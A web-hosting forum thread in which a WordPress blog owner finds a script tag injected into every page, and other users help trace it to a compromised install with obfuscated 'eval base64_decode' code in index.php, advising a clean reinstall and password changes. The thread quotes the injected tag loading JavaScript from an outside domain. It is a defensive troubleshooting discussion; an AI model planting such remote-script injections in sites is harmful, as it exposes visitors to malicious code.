Site hacked? Or x10hosting adding javascript to my site?

[k0nc3ptz]

I'm not sure what's going on? Either I've been hacked or x10hosting is running some ads on my site because it's disturbing my feeds. I run a blog for personal use so very highly unlikely that I've attracted the "wrong" kind of people. Here's the link to my blog: http://www.konceptz.tk, and if you click on RSS you'll realize there's a problem on line 118.

The script being added to every page on my site is:

<script type="text/rocketscript" data-rocketsrc="http://organicfoodmarkets.com.au/release.js"></script><script type="text/rocketscript" data-rocketsrc="http://organicfoodmarkets.com.au/release.js"></script>

Please someone just confirm this or shed some light on this issue, any help is appreciated. Thanks

 

[george21]

X10 wouldn't do that. I had something similar like this happen on my site, I'm yet to determine the cause. If I were you, I would change all your passwords (cPanel, WordPress, FTP, everything related to your site), remove the code and wait to see if it re-appears. If it does, there is a possibility you've been infected.

 

[descalzo]

Possibly from a WP plugin.

The "text/rocketscript" indicates CloudFlare is involved. http://www.cloudflare.com/wiki/Rocket_Script

 

[k0nc3ptz]

thanks for your help. So if I had to remove the script I'd have to search through every file on my site? That seems like a big pain, is there any easier or alternative method to remove the script?

 

[descalzo]

Disable all your plugins.
Tell CloudFlare to stop caching your site.
Add plugins back, one at a time.
Find where the script tags reappear.

 

[k0nc3ptz]

Very interesting, after I disabled all my plugins, paused cloudflare and cleared my cache. The junk element at bottom of all my pages don't say rocketscripts anymore but now say javascript... Any ideas?

 

[descalzo]

Where did you get your copy of WordPress?

Where did you get the theme?

 

[k0nc3ptz]

I made the theme myself using SiteGrinder, and the wordpress I just installed with cPanel.

 

[Livewire]

Your wordpress install is compromised; if you check the bottom of your wordpress's index.php in file manager, there's some "eval base64_decode" stuff - that does NOT come in a stock install.

If you've already got a databaes backup, great - remove the entire install and reinstall it from a fresh wordpress zip file downloaded from the wordpress homepage. If you don't, make one and THEN do an erase-reinstall.


The best advice was also already given for what to do after that - update all your passwords and don't re-use the same ones for the Admin pass on Wordpress when reinstalling it this round.

 

[k0nc3ptz]

Alright, seems like the best option left to try. Thanks everyone for helping out, much appreciated.

 

[winetradeconsulting21]

Hi,

If you check your website's logs you will see that it will be constantly "probed" by malicious scripts

in order to find vulnerabilities provided or found in some software-packages like WP, and others.

Best Regards,
Javier